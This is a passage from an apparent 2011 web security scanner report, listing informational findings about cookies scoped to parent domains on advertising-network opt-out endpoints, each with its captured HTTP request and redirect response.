Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/dclk/optoutnai.pl HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; rsi_segs=

Response

HTTP/1.1 302 Redirect
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 208
Content-Type: text/html
Location: http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out
Server: Microsoft-IIS/6.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR FIN INT DEM STA POL HEA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: id=OPT_OUT; domain=.doubleclick.net; path=/; expires=Wednesday, 09-Nov-2030 23:59:00 GMT
X-Powered-By: ASP.NET
Date: Sun, 13 Nov 2011 18:53:43 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&amp;state=opt_out">here</a
...[SNIP]...

5.32. http://optout.imiclk.com/cgi/optout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.imiclk.com
Path:   /cgi/optout.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/optout.cgi?nai=1&nocache=0.7203638 HTTP/1.1
Host: optout.imiclk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=0; IMI=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://optout.imiclk.com/cgi/nai_status.cgi?oo=1&rand=1321210422
Date: Sun, 13 Nov 2011 18:53:42 GMT
Connection: close
Set-Cookie: OL8U=0; expires=Wed, 10-Nov-2021 18:53:42 GMT; path=/; domain=imiclk.com
Set-Cookie: IMI=OPT_OUT; expires=Wed, 10-Nov-2021 18:53:42 GMT; path=/; domain=imiclk.com
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


5.33. http://optout.mookie1.decdna.net/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decdna.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; NSC_pqupvu_efdeob_qppm_iuuq=ffffffff0941322045525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: %2edecdna%2enet/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: NSC_pqupvu_efdeob_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:19 GMT; path=/; domain=.decdna.net
Location: http://optout.mookie1.pm14.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.34. http://optout.mookie1.decideinteractive.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decideinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_pqupvu_efdeobjou_qppm_iuuq=ffffffff0941322345525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: NSC_pqupvu_efdeobjou_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:10 GMT; path=/; domain=.decideinteractive.com
Location: http://optout.mookie1.decdna.net/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.35. http://optout.mookie1.dtfssearch.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.dtfssearch.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.dtfssearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_pqupvu_eugttfbsdi_qppm_iuuq=ffffffff0941322b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: NSC_pqupvu_eugttfbsdi_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: %2edtfssearch%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: %2edtfssearch%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:32 GMT; path=/; domain=.dtfssearch.com
Location: http://optout.b3.mookie1.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.36. http://optout.mookie1.pm14.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.pm14.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_pqupvu_qn14_qppm_iuuq=ffffffff0941322845525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: NSC_pqupvu_qn14_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:23 GMT; path=/; domain=.pm14.com
Location: http://optout.mookie1.dtfssearch.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.37. http://optout.mxptint.net/naioptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naioptout.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /naioptout.ashx?nocache=0.2503852 HTTP/1.1
Host: optout.mxptint.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
P3P: CP="NON CUR ADM DEVo PSAo PSDo OUR IND UNI COM NAV DEM STA PRE"
Location: /naicheck.ashx
Set-Cookie: mxpim=optout; domain=mxptint.net; expires=Mon, 13-Nov-2017 18:53:46 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fnaicheck.ashx">here</a>.</h2>
</body></html>

5.38. http://optout.xgraph.net/optout.gif.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.xgraph.net
Path:   /optout.gif.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.gif.jsp?nocache=0.2939305 HTTP/1.1
Host: optout.xgraph.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XG_OPT_OUT=OPTOUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: image/gif
Date: Sun, 13 Nov 2011 18:53:53 GMT
Location: http://optout.xgraph.net/optout.gif.jsp?check=1
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"
Server: nginx/1.0.4
Set-Cookie: XG_OPT_OUT=OPTOUT; Domain=.xgraph.net; Expires=Sun, 06-Nov-2039 18:53:53 GMT; Path=/
Content-Length: 0
Connection: keep-alive


5.39. http://p.brilig.com/contact/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/optout?nocache=0.5174185 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:25 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: BriligContact=OPT_OUT; Domain=.brilig.com; Expires=Tue, 05-Nov-2041 18:53:25 GMT
Set-Cookie: bbid=""; Domain=.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: bbid=""; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: BriligContact=OPT_OUT; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 18:53:25 GMT
Location: http://p.brilig.com/contact/isoptout?type=optout
X-Brilig-D: D=1315
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


5.40. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?optout=$nai_optout$&nocache=0.1675256 HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anProfile=-lwue04+0+s0=(8q)+h=bc+1m=1+rv=(-8)+1j=57:1+rt='32177B6A'+rs=c+1f=d+4=2lx

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app5.ny
Set-Cookie: anProfile=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anHistory=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCSC=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCnv=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anSt=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTRD=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTHS=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTD4=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: optout=0+0+0; Domain=.pro-market.net; Expires=Tue, 05-Nov-2041 18:53:42 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Location: http://pbid.pro-market.net/engine?optout=$nai_verify$
Content-Type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:41 GMT
Connection: close


5.41. http://pixel.adblade.com/optoutnai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.adblade.com
Path:   /optoutnai.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optoutnai.php?action=optout&nocache=0.6375042 HTTP/1.1
Host: pixel.adblade.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: __tuid=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.adblade.com
Set-Cookie: __sgs=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.adblade.com
Set-Cookie: __optout=1; expires=Fri, 11-Nov-2016 18:53:42 GMT; path=/; domain=.adblade.com
Location: /optoutnai.php?action=exists
Content-type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:42 GMT
Server: lighttpd/1.4.21


5.42. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/optout?nocache=0.0754388 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1; __utma=92051597.1379704095.1318616383.1318616383.1318616383.1; __utmz=92051597.1318616383.1.1.utmcsr=gsicommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/sitemap.php

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: apd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cmp=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uat=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1321210434_1321210427842:3568653602491747; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: opt=; Domain=.fetchback.com; Expires=Fri, 11-Nov-2016 18:53:54 GMT; Path=/
Set-Cookie: ppd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 13 Nov 2011 18:53:54 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://pixel.fetchback.com/serve/fb/optoutverification
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: image/gif


5.43. http://privacy.revsci.net/optout/optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optout.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout/optout.aspx?a=1&p=http://www.networkadvertising.org&nocache=0.5921878 HTTP/1.1
Host: privacy.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Set-Cookie: NETID01=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETID01=optout; Domain=.revsci.net; Expires=Thu, 05-Nov-2043 18:53:43 GMT; Path=/
Location: http://privacy.revsci.net/optout/optoutv.aspx?cs=True&v=1&p=http%3A%2F%2Fwww.networkadvertising.org%2F
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:43 GMT


5.44. http://px.owneriq.net/naioptout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /naioptout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /naioptout?nocache=0.6825036 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=optout

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://px.owneriq.net/naioptoutcheck
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sun, 13 Nov 2011 18:53:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Nov 2011 18:53:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ss=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: sg=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: si=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: sgeo=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: oxuuid=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: gguuid=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: abuuid=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: optout=optout; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.owneriq.net


5.45. http://rp.gwallet.com/r1/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/optout?optout&nocache=0.5156474 HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
